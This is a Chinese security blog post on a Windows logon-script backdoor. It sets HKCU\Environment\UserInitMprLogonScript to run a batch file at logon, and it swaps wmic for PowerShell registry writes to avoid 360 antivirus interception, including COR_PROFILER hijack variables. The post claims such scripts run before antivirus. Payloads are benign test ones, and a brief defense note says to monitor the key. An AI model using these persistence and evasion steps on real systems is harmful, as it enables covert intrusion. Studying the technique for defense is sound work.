Logon Scripts的后门实现思路

简介: 本文讲的是Logon Scripts的后门实现思路,依旧是对后门利用方法做介绍,本次介绍的是使用Logon Scripts的方法。然而我在研究过程中发现了一个特别的用法,脚本优先于杀毒软件执行,能够绕过杀毒软件对敏感操作的拦截,本文将要具体介绍这个技巧。
本文讲的是 Logon Scripts的后门实现思路依旧是对后门利用方法做介绍,本次介绍的是使用Logon Scripts的方法。然而我在研究过程中发现了一个特别的用法,脚本优先于杀毒软件执行,能够绕过杀毒软件对敏感操作的拦截,本文将要具体介绍这个技巧。

0x01 简介

· Logon Scripts用法

· 绕过360对wmi调用的拦截

· 特别用法

0x02 Logon Scripts用法

思路来自于Adam@Hexacorn,地址如下:

http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/

简要介绍Logon Scripts的用法

注册表路径:HKCREnvironment

创建字符串键值: UserInitMprLogonScript

键值设置为bat的绝对路径:c:test11.bat

如下图

Logon Scripts的后门实现思路

bat内容如下:

start calc.exe

注销,登录

执行脚本11.bat,弹出计算器

0x03 绕过360对通过wmi修改环境变量的拦截

在之前的文章《Use CLR to maintain persistence》提到过使用wmic修改环境变量的方法

命令如下:

wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"

wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"

然而,360会对WMI的操作进行拦截,如下图

Logon Scripts的后门实现思路

其实通过WMI添加环境变量等价于在注册表HKCREnvironment新建键值

所以对WMI的操作可以通过写注册表的操作进行代替

以上WMI命令可替换为如下powershell代码:

New-ItemProperty "HKCU:Environment" COR_ENABLE_PROFILING -value "1" -propertyType string | Out-Null

New-ItemProperty "HKCU:Environment" COR_PROFILER -value "{11111111-1111-1111-1111-111111111111}" -propertyType string | Out-Null

0x04 特别用法

源于我的一个特别的想法

我在对该技巧研究的过程中,产生了一个有趣的想法,Logon Scripts启动的顺序是否优先于其他程序呢?

如果是的话,那么是否也优先于杀毒软件呢?

下面开始我的测试:

1、cmd输入如下代码

wmic ENVIRONMENT create name="test",username="%username%",VariableValue="I run faster!"

不出意外,被拦截

2、设置Logon Scripts

11.bat代码如下:

wmic ENVIRONMENT create name="test",username="%username%",VariableValue="I run faster!"
reg query HKEY_CURRENT_USEREnvironment /V test
pause

3、启用Logon Scripts

注册表路径:HKCREnvironment

创建字符串键值: UserInitMprLogonScript

键值设置为bat的绝对路径:c:test11.bat

由于调用WMI会被拦截,可以通过powershell实现,代码如下:

New-ItemProperty "HKCU:Environment" UserInitMprLogonScript -value "c:test11.bat" -propertyType string | Out-Null

4、注销,重新登录,测试

如果注册表HKCREnvironment成功被写入键值test REG_SZ I run faster!,说明Logon Scripts优先于杀毒软件执行,绕过杀毒软件的限制

完整操作如下图

Logon Scripts的后门实现思路

测试成功,验证我们的结论

0x05 防御

监控注册表键值HKCREnvironmentUserInitMprLogonScript

0x06 小结

本文对Logon Scripts的用法进行了测试,并且介绍了一个特别用法,Logon Scripts能够优先于杀毒软件执行,绕过杀毒软件对敏感操作的拦截。

站在防御的角度,要对此保持警惕。




原文发布时间为:2017年9月12日
本文作者:3gstudent
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
目录
相关文章
|
2月前
|
网络安全 数据库 Windows
Metasploit6.0系列教程 -- MSF控制台命令
Metasploit6.0系列教程 -- MSF控制台命令
18 1
|
2月前
|
Shell
Metasploit -- 利用Hash远程登录
Metasploit -- 利用Hash远程登录
18 2
|
10月前
|
SQL 安全
dedecms cookies泄漏导致SQL漏洞 article_add.php 的解决方法
漏洞名称:dedecms cookies泄漏导致SQL漏洞 补丁文件:/member/article_add.php 补丁来源:云盾自研 漏洞描述:dedecms的文章发表表单中泄漏了用于防御CSRF的核心cookie,同时在其他核心支付系统也使用了同样的cookie进行验证,黑客可利用泄漏的cookie通过后台验证,进行后台注入。
72 0
|
11月前
|
SQL 存储 安全
DVWA之SQL注入—Impossible level代码审计
审计checkToken 首先,该代码片段使用了 checkToken() 函数来验证 Anti-CSRF 令牌,即检查用户的访问令牌是否有效,以防止CSRF。
139 1
|
11月前
|
存储 SQL 网络安全
[网络安全]DVWA之Brute Force攻击姿势及解题详析合集
[网络安全]DVWA之Brute Force攻击姿势及解题详析合集
107 0
[网络安全]DVWA之Brute Force攻击姿势及解题详析合集
|
11月前
|
网络协议 C++
Bypass Anti-Virus——免杀姿势学习、记录、复现文档
Bypass Anti-Virus——免杀姿势学习、记录、复现文档
327 0
|
监控 安全 Windows
Metasploit -- 木马生成原理和方法
Metasploit -- 木马生成原理和方法
526 0
Metasploit -- 木马生成原理和方法
|
监控 网络安全 数据安全/隐私保护